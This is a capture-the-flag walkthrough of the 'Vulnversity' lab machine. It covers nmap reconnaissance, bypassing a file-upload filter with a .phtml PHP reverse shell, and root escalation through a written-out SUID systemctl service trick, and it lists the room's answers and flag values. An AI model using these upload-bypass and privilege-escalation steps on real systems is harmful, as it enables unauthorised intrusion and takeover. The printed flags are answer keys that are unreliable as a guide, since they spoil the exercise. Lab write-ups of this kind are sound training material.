Vulnversity

Reconnaissance

As usually we gonna scan the target with the nmap

└──╼ $sudo nmap -sS -sV -sC -T4 --min-rate 5000 10.10.14.231 -vv
...
Discovered open port 21/tcp on 10.10.14.231
Discovered open port 445/tcp on 10.10.14.231
Discovered open port 22/tcp on 10.10.14.231
Discovered open port 139/tcp on 10.10.14.231
Discovered open port 3128/tcp on 10.10.14.231
Discovered open port 3333/tcp on 10.10.14.231
Completed SYN Stealth Scan at 22:29, 0.67s elapsed (1000 total ports)
Initiating Service scan at 22:29
Scanning 6 services on 10.10.14.231
Completed Service scan at 22:29, 22.16s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.14.231.
NSE: Starting runlevel 1 (of 3) scan.
...
Scanned at 2023-10-13 22:29:11 EDT for 30s
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     REASON         VERSION
21/tcp   open  ftp         syn-ack ttl 63 vsftpd 3.0.3
22/tcp   open  ssh         syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a4ffcb8c8761cb5851cacb286411c5a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYQExoU9R0VCGoQW6bOwg0U7ILtmfBQ3x/rdK8uuSM/fEH80hgG81Xpqu52siXQXOn1hpppYs7rpZN+KdwAYYDmnxSPVwkj2yXT9hJ/fFAmge3vk0Gt5Kd8q3CdcLjgMcc8V4b8v6UpYemIgWFOkYTzji7ZPrTNlo4HbDgY5/F9evC9VaWgfnyiasyAT6aio4hecn0Sg1Ag35NTGnbgrMmDqk6hfxIBqjqyYLPgJ4V1QrqeqMrvyc6k1/XgsR7dlugmqXyICiXu03zz7lNUf6vuWT707yDi9wEdLE6Hmah78f+xDYUP7iNA0raxi2H++XQjktPqjKGQzJHemtPY5bn
|   256 ac9dec44610c28850088e968e9d0cb3d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHCK2yd1f39AlLoIZFsvpSlRlzyO1wjBoVy8NvMp4/6Db2TJNwcUNNFjYQRd5EhxNnP+oLvOTofBlF/n0ms6SwE=
|   256 3050cb705a865722cb52d93634dca558 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGqh93OTpuL32KRVEn9zL/Ybk+5mAsT/81axilYUUvUB
139/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  syn-ack ttl 63 Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 43130/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 39828/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 53476/udp): CLEAN (Failed to receive data)
|   Check 4 (port 49708/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2023-10-13T22:29:38-04:00
|_clock-skew: mean: 1h20m02s, deviation: 2h18m34s, median: 2s
| smb2-time: 
|   date: 2023-10-14T02:29:37
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   VULNUNIVERSITY<00>   Flags: <unique><active>
|   VULNUNIVERSITY<03>   Flags: <unique><active>
|   VULNUNIVERSITY<20>   Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000

Answers

Scan the box; how many ports are open?
6
What version of the squid proxy is running on the machine?
3.5.12
How many ports will Nmap scan if the flag -p-400 was used?
400
What is the most likely operating system this machine is running?
Ubuntu
What port is the web server running on?
3333
What is the flag for enabling verbose mode using Nmap?
-v

Locating directories using Gobuster

What is the directory that has an upload form page?
/internal/

Compromise the Webserver

What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
.php

nano phpext.txt
.php
.php3
.php4
.php5
.phtml

search for filename and add the placeholder Add § on the extension for the intruder to try all the extensions that we defined in in the file as payload.

load the payload file phpext.txt onto burp suite

Run this attack, what extension is allowed?
.phtml

Editing reverse shell if you don't have it in your machine download it from github, I'm using Parrot OS it has the script saved on the folder usr/share/webshells/php/php-reverse-shell.php

Edit the IP address and maybe the port number make sure you rename the file to .phtml. Then upload the file to the server.

Setting up a netcat listener on the our machine

Upgrading the shell (not required)

Answers

What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd7992fbe8a6ad22a63361004cfcedb

Privilege Escalation

searching for SUID files in the system

find / -user root -perm -4000 2>/dev/null -exec ls -ldn {} \;

go to gtfobins and search for systemctl and manipulate the original commands as follows:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod u+s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
Copy

past it in the terminal and run /bin/bash -p

Answers

On the system, search for all SUID files. Which file stands out?
/bin/systemctl
Become root and get the last flag (/root/root.txt)
a58ff8579f0a9270368d33a9966c7fd5

CyberPulse Security